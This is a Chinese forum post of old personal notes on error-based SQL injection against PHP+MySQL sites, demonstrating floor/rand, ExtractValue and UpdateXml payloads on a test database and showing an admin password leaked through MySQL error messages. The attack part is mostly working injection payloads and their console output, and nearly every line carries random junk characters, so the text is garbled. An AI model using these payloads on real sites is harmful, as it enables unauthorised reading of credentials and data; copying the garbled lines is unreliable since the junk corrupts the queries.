放点原来的笔记,Mysql在执行语句的时候会抛出异常信息信息,而php+mysql架构的网站往往又将错误代码显示在页面上,这样可以通过构造如下三种方法获取特定数据。
8 V, w: F: O2 W$ E# b实际测试环境:
" s+ P9 m9 s& E; F: t% _
+ t& S. W, U9 R; H- N
* t8 ?( p) m4 K- X9 cmysql> show tables;
9 ^% G l; Z w% J0 c" E e+----------------+* H" \+ X2 t, v2 B- J* }; P7 K+ J- b
| Tables_in_test |/ ~- [8 _9 z$ S7 m/ V8 a& R
+----------------++ ?+ G d) H+ I# o; u" i5 ^3 E
| admin |( z+ i- d& `4 j) m( W
| article |& A& E( b9 `& d% b: D
+----------------+
: M) I$ x6 H/ f6 q
% Z, B9 u% }( Y9 v' {3 t n! d# e& g8 ?0 b( k7 b) x3 Y. {
% ^9 {5 {4 I& T! e6 a
mysql> describe admin;$ V' @1 W+ L* w1 p
+-------+------------------+------+-----+---------+----------------+; w T" v5 v$ ]' T
| Field | Type | Null | Key | Default | Extra |3 K* p" _7 v1 J4 O6 d8 C8 R4 W2 S0 f
+-------+------------------+------+-----+---------+----------------+
8 l) L I" o1 o- x) @8 j| id | int(10) unsigned | NO | PRI | NULL | auto_increment |
7 E% R9 \+ q& U+ O# Y& H- H; Z| user | varchar(50) | NO | | NULL | |' n. z6 @6 Y: \+ a5 @+ Q
| pass | varchar(50) | NO | | NULL | |$ L2 e2 i/ x6 P- b8 E, ]( f
+-------+------------------+------+-----+---------+----------------+( R ^3 P* j6 ]2 C/ {6 U3 k
% z: k$ o$ V% c) `4 q9 t
4 L% @2 E" I2 [0 d" w; p; T 0 I- |! _3 b7 l' _$ ^
mysql> describe article;4 |; _& w" D5 d$ F4 g5 U, a) Y3 d
+---------+------------------+------+-----+---------+----------------+1 z$ g9 R4 n. o9 W& f
| Field | Type | Null | Key | Default | Extra |
9 j! D+ y3 b; ]# k: h+---------+------------------+------+-----+---------+----------------+
8 [, U/ F4 s Q8 x| id | int(10) unsigned | NO | PRI | NULL | auto_increment |1 e8 N! @2 b5 D- b9 I
| title | varchar(50) | NO | | NULL | |
, \' Q* d! b/ V! Y/ O| content | varchar(50) | NO | | NULL | |2 B q$ y0 C: Q, d
+---------+------------------+------+-----+---------+----------------+0 w, g( ^" ~/ k5 T9 n
1、通过floor报错5 k. K: b! p( |$ ]" Z+ A
可以通过如下一些利用代码
, |% { u% z- t/ S. O( D; L! s$ ^
, c q# O0 S9 \ W# {- y $ ]- y$ {3 J' P$ G
and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x1 f: l. k! K$ G" c; t
from information_schema.tables group by x)a);% @5 U! x2 S6 |7 g9 C# N& ~
1 s7 y! C$ ^. P, s0 D
7 G) I/ v8 Z8 [5 l4 v# v$ x2 [and (select count(*) from (select 1 union select null union select !1)x3 @, x% r) f. P# s0 ^. H+ T% \8 N
group by concat((select table_name from information_schema.tables limit 1),; T5 C& g$ J0 t
floor(rand(0)*2)));2 s3 X% U @5 h1 R' k
举例如下:. ]6 Z1 T+ r. A) ?
首先进行正常查询:# l& L1 i/ }& O9 y9 Q
# a( {0 N9 K) t; s8 e( a0 h# y
mysql> select * from article where id = 1;
6 J2 V0 J/ N8 S1 h4 Q( l4 h6 |# p+----+-------+---------+
' ^# H- d }) U9 ~* I| id | title | content |3 T* C4 ]0 W/ \: S& Y/ `. g0 o
+----+-------+---------+7 |5 E0 c2 W1 }
| 1 | test | do it |
" O- B. e( Z9 [5 w |5 h+----+-------+---------+
9 l: v5 G, `: s5 _5 L假如id输入存在注入的话,可以通过如下语句进行报错。 ?/ a8 [- G- v
. [$ u+ [' Y( y, s/ h 0 [% q/ A: o S- Q' i7 p# N8 a
mysql> select * from article where id = 1 and (select 1 from
; m' z( d1 L- z9 L; ^(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);' c! G# X+ q* b
ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'" m7 |% i4 b' m/ i
可以看到成功爆出了Mysql的版本,如果需要查询其他数据,可以通过修改version()所在位置语句进行查询。 ?! s5 H# C% [+ ] X2 N
例如我们需要查询管理员用户名和密码:
0 t! P" `$ K& p% a/ x' P" Q: d8 O" oMethod1:
; k; t1 g3 k4 W' W7 e1 z
# s5 F( z& l; y# Z( q " D. F. g# N) O. `
mysql> select * from article where id = 1 and (select 1 from
+ |( g8 M' Z2 l+ r; C# }9 i# a! w9 @(select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x
# T' g1 F0 ]6 a' P4 {. c* Mfrom information_schema.tables group by x)a);+ r: V: a6 u' o0 m
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'! F- b e8 A8 L' }
Method2:
- n% r/ E* i9 X( d% c t; N
7 U4 ~+ ^2 S5 j1 M
! I0 [/ n, T! s! S; ~: cmysql> select * from article where id = 1 and (select count(*)4 u- B1 W5 F# t, `
from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),
' C: H1 u; l3 H, i5 vfloor(rand(0)*2)));
' z/ ^* K0 g$ d# zERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'
) j- A) q! R/ w2 f9 x, x0 t2、ExtractValue
# r Z8 G- Q5 |! {; e4 ?测试语句如下
- K$ C; u" m, B2 Q
6 ?. Q; o" M2 c( K: g& |9 ` - U' |2 U. m& m- V% z" T/ @
and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));" A9 o$ H. Y. b9 J, M0 L
实际测试过程' ^0 V: c) T2 [: V* m
: J; G' d) y b ' {! M3 o7 W6 ~9 m* o T
mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,
4 ]2 l `3 z8 A' O2 r9 b(select pass from admin limit 1)));--, U9 O6 r% y+ J# h
ERROR 1105 (HY000): XPATH syntax error: '\admin888'% J8 Y/ }% A, G. N H6 l/ }3 u
3、UpdateXml
7 v* I% l. r* R& _9 @# y3 I测试语句
3 w3 M* r4 V9 q5 p
+ s1 K; L$ [1 O- Y& H" z/ G
0 U" c8 I* L6 T5 kand 1=(updatexml(1,concat(0x5e24,(select user()),0x5e24),1))/ v& u; {9 r! u
实际测试过程7 S) ~0 O8 l9 x
: U* ?3 Z4 Q" d( o6 x) F
& f" P; S. O0 P3 A6 \. C3 p
mysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x5e24,
4 t, G5 U- s% E, ?4 D(select pass from admin limit 1),0x5e24),1));! R) ?3 s: n: c( _( O) `
ERROR 1105 (HY000): XPATH syntax error: '^$admin888^$'7 w7 J) C# q" c- w1 b& F+ t. P( V
All, thanks foreign guys.0 E" b0 J N9 Q4 m
# Q g0 ]7 F/ h4 }2 w" [% E6 B3 w+ `8 ~1 B: G- l# b
|
发表于 2012-12-10 10:28:51
收藏
支持
反对